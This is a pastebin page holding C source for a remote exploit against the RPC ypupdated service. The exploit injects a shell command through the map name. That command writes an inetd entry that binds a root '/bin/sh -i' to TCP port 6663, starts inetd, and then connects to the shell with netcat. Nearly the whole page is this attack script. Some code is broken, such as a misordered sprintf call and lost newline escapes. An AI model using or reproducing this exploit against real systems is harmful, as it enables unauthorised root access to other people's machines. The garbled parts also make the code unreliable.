Psst.. new poll here.
Psst.. new forums here.
Microsoft is blocking us again (TY IP Reputation!) so just use oauth login instead. :)
Paste
Pasted as text by nahime ( 18 years ago )
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <netinet/in.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <fcntl.h>
#include <rpc/rpc.h>
#define MAXMAPNAMELEN 255
#define MAXYPDATALEN 1023
#define MAXERRMSGLEN 255
typedef struct{
unsigned int yp_buf_len;
char * yp_buf_val;
} yp_buf;
struct ypupdate_args{
char * mapname;
yp_buf key;
yp_buf datum;
};
typedef struct ypupdate_args ypupdate_args;
#ifdef __cplusplus
extern "C" bool_t xdr_ypupdate_args(XDR *,ypupdate_args *);
#elif __STDC__
extern bool_t xdr_ypupdate_args(XDR *,ypupdate_args *);
#else
bool_t xdr_ypupdate_args();
#endif
void main(argc, argv)
int argc;
char *argv[];
{
CLIENT * cli;
unsigned long prog=100028;
unsigned int vers=1;
struct sockaddr_in skn;
struct timeval timeVal;
struct hostent * hostEnt;
char *comando;
ypupdate_args ypArg;
unsigned long rtnval;
unsigned int desc;
char * comm = "|echo "6663 stream tcp nowait root /bin/sh sh -i ">/tmp/x ; /usr/sbin/inetd -s /tmp/x ;sleep 10 ; /bin/rm -f /tmp/x ; ";
if(argc<2) {
printf("example: yxp targetn");
exit(1);
}
timeVal.tv_usec=0;
timeVal.tv_sec=15;
desc=RPC_ANYSOCK;
ypArg.datum.yp_buf_val="x";
ypArg.datum.yp_buf_len=strlen(ypArg.datum.yp_buf_val)+1;
ypArg.key.yp_buf_val="x";
ypArg.key.yp_buf_len=strlen(ypArg.key.yp_buf_val)+1;
ypArg.mapname=comm;
if ((hostEnt=gethostbyname(argv[1]))==NULL){
printf("gethostbyname failuren");
printf("ip: argv[1]");
exit(1);
}
skn.sin_family=AF_INET;skn.sin_port=htons(0);
bcopy(hostEnt->h_addr,&skn.sin_addr.s_addr,4);
if ((cli=clntudp_create(&skn,prog,vers,timeVal,&desc))==NULL){
printf("clntudp_create failuren");
exit(1);
}
cli->cl_auth=authunix_create("localhost",0,0,0,0);
clnt_call(cli,1,xdr_ypupdate_args,&ypArg,xdr_u_int,&rtnval,timeVal);
// printf("ip: %sn", argv[1]);
sprintf("nc -v %s 6663",comando, argv[1]);
system(comando);
}
Revise this Paste